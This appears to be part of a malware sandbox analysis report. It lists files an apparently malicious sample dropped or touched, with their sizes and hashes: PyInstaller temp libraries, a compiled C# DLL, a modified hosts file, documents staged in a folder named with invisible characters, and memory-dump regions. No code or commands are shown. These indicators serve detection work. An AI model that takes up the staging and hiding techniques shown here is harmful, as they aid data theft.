SHA512
7cb7a039a0a1a7111c709d22f6e83ab4cb8714448daddb4d938c0d4692fa8589baa1f80a6a0eb626424b84212da59275a39e314a0e6ccaae8f0be1de4b7b994e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\sqlite3.dll

Filesize
644KB

MD5
de562be5de5b7f3a441264d4f0833694

SHA1
b55717b5cd59f5f34965bc92731a6cea8a65fd20

SHA256
b8273963f55e7bf516f129ac7cf7b41790dffa0f4a16b81b5b6e300aa0142f7e

SHA512
baf1fbdd51d66ea473b56c82e181582bf288129c7698fc058f043ccfbcec1a28f69d89d3cfbfee77a16d3a3fd880b3b18fd46f98744190d5b229b06cf07c975a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\unicodedata.pyd

Filesize
296KB

MD5
2730c614d83b6a018005778d32f4faca

SHA1
611735e993c3cc73ecccb03603e329d513d5678a

SHA256
baa76f6fd87d7a79148e32d3ae38f1d1fe5a98804b86e636902559e87b316e48

SHA512
9b391a62429cd4c40a34740ddb04fa4d8130f69f970bb94fa815485b9da788bca28681ec7d19e493af7c99a2f3bf92c3b53339ef43ad815032d4991f99cc8c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgeirgxq.jef.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gwqjk4h3\gwqjk4h3.dll

Filesize
4KB

MD5
c8ce1a961b08dd86c2cabc1652236d8f

SHA1
bff86b5a68a1a66f6a97905731dc95f1de43b310

SHA256
cb76acbac1adb2a5399d270476adbd3bb62cc2487db2bb40ef747f2f4291d81d

SHA512
154bd1fc19d247b99e6097363f6513ca8404b54b856b7f2530cd6ee3468d43d0fe553c758dc82d290bccdd3ae6794b93489d4da31b3b36770de036fb0c8d9683

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\DebugSkip.xlsx

Filesize
10KB

MD5
a13f01ec91c7e7f3075a1c431d73bb92

SHA1
e11910a136dd3bb1c0ad4bd063905f25bf180701

SHA256
d77a8e1b14f0037d4d3160bf9a00c5dd2cc233eebef48ad1945480e221780f4a

SHA512
69d00843b39d2d13a7cb770ad5f6e371843fc4f0fb989add0040237efbf325daecbc7c7ec963c5c1ad1b8ba3a715739c8ab5fa6f9cfa36a39fdb9f667dda106a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\FindUninstall.csv

Filesize
168KB

MD5
cf9d34db24517b3eb15f5218c5286713

SHA1
ef8211f64a3e759a62cc33a27773b4ba5f0b2aa8

SHA256
07350da2a92286677f32bd1facf74ecfb7ee86158a56f8a8c2601fb4738a57b1

SHA512
9881f99ade87ed462a0c109daa47a9ce387a517efd8c74b3c2e14b913162d13b6e78803e5aca931d903ed31a021d5735ea6b1aab97f4e060b8f12cdc29570df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\MountOptimize.docx

Filesize
20KB

MD5
c94c2605c2690a2729dc124b7a0fc40d

SHA1
0e0c98ab337bc41c4669fe69466d8fe42d42e6b6

SHA256
dfffcf9823db194ef27b5ca4f3132153feff99d5f9ba30220d61332d17cc7124

SHA512
bd9dc382996c25b1a6bf1c2a4ddebd3ec264ceb0c1166fa0d64bd1b021bbbc9c12a14a06a8c9da2211468e1c818c8a7bdcf60a70733b358b08d7dd1c85741bf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\MoveWrite.xlsx

Filesize
10KB

MD5
87541b10dfe5a22aa973d8dee6d35216

SHA1
f389aba602babb5a42cfeca6cb681dcfa67fac37

SHA256
8a2857bf35b1e4500616dcbe5df2e97a63ff7bc671e601d9671004e73221459e

SHA512
200edf286bfc44eb9b29555b956ff8aa060b7eeb7ff04351cdaa2b2d5aa523236dd9dfc3c1e0eb60b85b6a04cc89105fbf1e8f80dfaded874c1fdd3f2144d981

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\PushRevoke.docx

Filesize
14KB

MD5
8566b28bd72e1b930da4f489e4b03e87

SHA1
7f36167c30420a2fdf99a52d0e9d0dab86975675

SHA256
dc995a0400e6d2a6ce10ec5b745bc5d888c8c00eee18665338ee3e1e6db4bf26

SHA512
265117cbe6fbfb731cecb5e03fbf6364f0b4039a4575c1ab8b2c0785977cf90d0ddabde9cdeda8b875c77f494858a661dc26e9ce8a5018d4d910a35dc7665abc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\TraceConnect.mp3

Filesize
195KB

MD5
b8758b0652c44b69d3918b2894bcb73a

SHA1
85eb48cda0e5df0872c07962c19a5c15c9feaf52

SHA256
1ecd3c24d824c6efc726be540d663949ff0db5038f2f1e33e4b4e88ee2b1a40a

SHA512
6df67fb5c986212a1f78d6d612b253567fe434619a2e47284ff3a9b01063eee866a3184d4aa3153543da0246a55b6aac88d82173ffaf4640cf400c01ce400e30

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Desktop\UnblockFind.mp3

Filesize
266KB

MD5
16bbec26afb6463b4e9741cbb242ecfd

SHA1
7c25c125dfecfd60ba0bc46a1bc93c2a2f8a508d

SHA256
765fc7c61b4bb376cceea49d8854a1fe0a720e82fe17b3cae1a6b5a3027c08b2

SHA512
f1e1b66bef82bd87cc464ce5550e61148a0c4ce5e462bafbd11874c2e27a49cd89724476e743b9e1c241fb0a3d057d72dc95e8b634b61fd6cf6e3d430d8dffa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Documents\DisableEnter.docx

Filesize
16KB

MD5
7fe7456f88d9aa01583d3374f7477bd1

SHA1
89bb00749cfee64de9438340741825c93c1b0230

SHA256
ba212e5b532df7337ae316d2ce1063ad8aaea8f96d0c13327932ba296282cf33

SHA512
5833ee7aa79fa865bee368ec434a03517571acd20b3d6ac2f06f28859ac59288d5ed872a8a99e81d88a2db99842c6e65e7dcd50ac235d23a374060e951e8c9bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Documents\ExitSwitch.csv

Filesize
967KB

MD5
c858eee103dc3f88ef534d14bc7e59e4

SHA1
73f1051c5561ce6bc086b18ede1a651d49984590

SHA256
946422701f0f6787735d52392b63abf05c3bdc9eeec1b68a259b2c703d82ac12

SHA512
29c090fc3a3539000a7be8afc0c7868489a74ff4ba5a556dc4d4107528f31e9d37a65618245ea22a7ab428b47de59e5b1c004946e384ebd07025d40ac1b21199

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Documents\FindJoin.txt

Filesize
1.2MB

MD5
7264f598b9a3b519d4e2cdcac20ebcff

SHA1
7f104c785114482175a9ca12612c69208cd8d710

SHA256
5e46f80cbc32000b907b3fe3b0e60910b20978ce3a77d1291837208241e9bed7

SHA512
a50cac2bbf09368b2de8c0afc10096e2728223f39217aa97547b33b0be0420872afbc53adb2d3b2f8c951621f6e289843f989f7bdaf0370da1e8648ba1f0c89e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Documents\FormatRepair.csv

Filesize
910KB

MD5
b1de02e6a41ae611ba88181bdae7383d

SHA1
8e974058ba5d3f2192fbdc78081a8559b74b891d

SHA256
284f28662a7aca610f1b4825d4fed6e6673047d679b8b2f891c1777dc0fe7d24

SHA512
b4211e7fba51e7b14da5d8dbb456b6ae6d7f18a81eefe6bae7a19c8b58c7988989e838de72fec1029670a14b92be9558c7cf6fc6647d8b3e54a7092b3d96718c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‌ \Common Files\Documents\ReceiveMeasure.docx

Filesize
19KB

MD5
71e93d1b7cbf1ce2ddc19b26f67b30ef

SHA1
21b5b8fd46f9554c26cc165c28592007b8d60fbf

SHA256
a68c7dee9d8659b0fc66b3520265cf40a7fa313317fcec4d4aec376d0f9c450e

SHA512
05b7acbc417fe8e23272d06bf724250e7dd54bf0d96528072e7738f848e89623445eee054c8a15cf32c49059c2f0ec3c82ce8250c9532a4497c06d762f273baf

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwqjk4h3\CSCD57641B08FCF4C02A5FF43E113A8FF9.TMP

Filesize
652B

MD5
d491924cb87293edb783433faacc2b50

SHA1
7daab89fc531d3f1cb2fd1a30057da378425da2b

SHA256
fff95f3d41e1da6d357b27497eca5b8f616fd7b24d428c8c5269bd969e919858

SHA512
717249259e0b1fd3e2d26c19cfa4165d83b5a1979a6695538ad5bb94ae81834d3c217379a2f4b2d339c4e5d269e9a7e5a57cd9f006b3c54a848342914d02ed53

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwqjk4h3\gwqjk4h3.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gwqjk4h3\gwqjk4h3.cmdline

Filesize
607B

MD5
4bed84893a25875fc4bf0eef7bcd7098

SHA1
3db5fb0d8a66dbf4c7a74f66c1863d414300c27e

SHA256
3ad48189707eae3936fb114b9b972ddb83297bdf1e64912c08193df1ab345f5d

SHA512
c3c519ffdbc3ab81f34d46d80004e80efbec09e670099370b495b40bc82f588345304ca563ba816c4f4199442d18c56f0ced4a0287a9194b765b619f092ee78e

Download Submit
memory/1556-79-0x00007FF8E1150000-0x00007FF8E115D000-memory.dmp

Filesize
52KB

Download
memory/1556-60-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp

Filesize
1.5MB

Download
memory/1556-106-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp

Filesize
144KB

Download
memory/1556-369-0x00007FF8E1300000-0x00007FF8E1314000-memory.dmp

Filesize
80KB

Download
memory/1556-82-0x00007FF8DB540000-0x00007FF8DB65A000-memory.dmp

Filesize
1.1MB

Download
memory/1556-81-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp

Filesize
104KB

Download
memory/1556-78-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp

Filesize
180KB

Download
memory/1556-48-0x00007FF8E4A50000-0x00007FF8E4A5F000-memory.dmp

Filesize
60KB

Download
memory/1556-76-0x00007FF8E1300000-0x00007FF8E1314000-memory.dmp

Filesize
80KB

Download
memory/1556-370-0x00007FF8E1150000-0x00007FF8E115D000-memory.dmp

Filesize
52KB

Download
memory/1556-30-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp

Filesize
148KB

Download
memory/1556-25-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp

Filesize
6.8MB

Download
memory/1556-304-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp

Filesize
204KB

Download
memory/1556-306-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp

Filesize
824KB

Download
memory/1556-307-0x000001FF90FA0000-0x000001FF914D3000-memory.dmp

Filesize
5.2MB

Download
memory/1556-73-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp

Filesize
5.2MB

Download
memory/1556-74-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp

Filesize
148KB

Download
memory/1556-72-0x000001FF90FA0000-0x000001FF914D3000-memory.dmp

Filesize
5.2MB

Download
memory/1556-71-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp

Filesize
824KB

Download
memory/1556-70-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp

Filesize
6.8MB

Download
memory/1556-66-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp

Filesize
204KB

Download
memory/1556-64-0x00007FF8E47C0000-0x00007FF8E47CD000-memory.dmp

Filesize
52KB

Download
memory/1556-63-0x00007FF8E49B0000-0x00007FF8E49C9000-memory.dmp

Filesize
100KB

Download
memory/1556-107-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp

Filesize
1.5MB

Download
memory/1556-58-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp

Filesize
144KB

Download
memory/1556-56-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp

Filesize
104KB

Download
memory/1556-54-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp

Filesize
180KB

Download
memory/1556-322-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp

Filesize
5.2MB

Download
memory/1556-348-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp

Filesize
1.5MB

Download
memory/1556-342-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp

Filesize
6.8MB

Download
memory/1556-343-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp

Filesize
148KB

Download
memory/1556-364-0x00007FF8E49B0000-0x00007FF8E49C9000-memory.dmp

Filesize
100KB

Download
memory/1556-357-0x00007FF8DB730000-0x00007FF8DBDF5000-memory.dmp

Filesize
6.8MB

Download
memory/1556-381-0x00007FF8DB660000-0x00007FF8DB72E000-memory.dmp

Filesize
824KB

Download
memory/1556-380-0x00007FF8DF8E0000-0x00007FF8DF913000-memory.dmp

Filesize
204KB

Download
memory/1556-379-0x00007FF8E47C0000-0x00007FF8E47CD000-memory.dmp

Filesize
52KB

Download
memory/1556-378-0x00007FF8DBFE0000-0x00007FF8DC15F000-memory.dmp

Filesize
1.5MB

Download
memory/1556-377-0x00007FF8DF920000-0x00007FF8DF944000-memory.dmp

Filesize
144KB

Download
memory/1556-376-0x00007FF8E4A00000-0x00007FF8E4A1A000-memory.dmp

Filesize
104KB

Download
memory/1556-375-0x00007FF8DFF30000-0x00007FF8DFF5D000-memory.dmp

Filesize
180KB

Download
memory/1556-374-0x00007FF8E4A50000-0x00007FF8E4A5F000-memory.dmp

Filesize
60KB

Download
memory/1556-373-0x00007FF8DFF60000-0x00007FF8DFF85000-memory.dmp

Filesize
148KB

Download
memory/1556-372-0x00007FF8D7D40000-0x00007FF8D8273000-memory.dmp

Filesize
5.2MB

Download
memory/1556-371-0x00007FF8DB540000-0x00007FF8DB65A000-memory.dmp

Filesize
1.1MB

Download
memory/2380-237-0x000002187C2B0000-0x000002187C2B8000-memory.dmp

Filesize
32KB

Download
memory/3832-91-0x000001AA64880000-0x000001AA648A2000-memory.dmp

Filesize
136KB

Download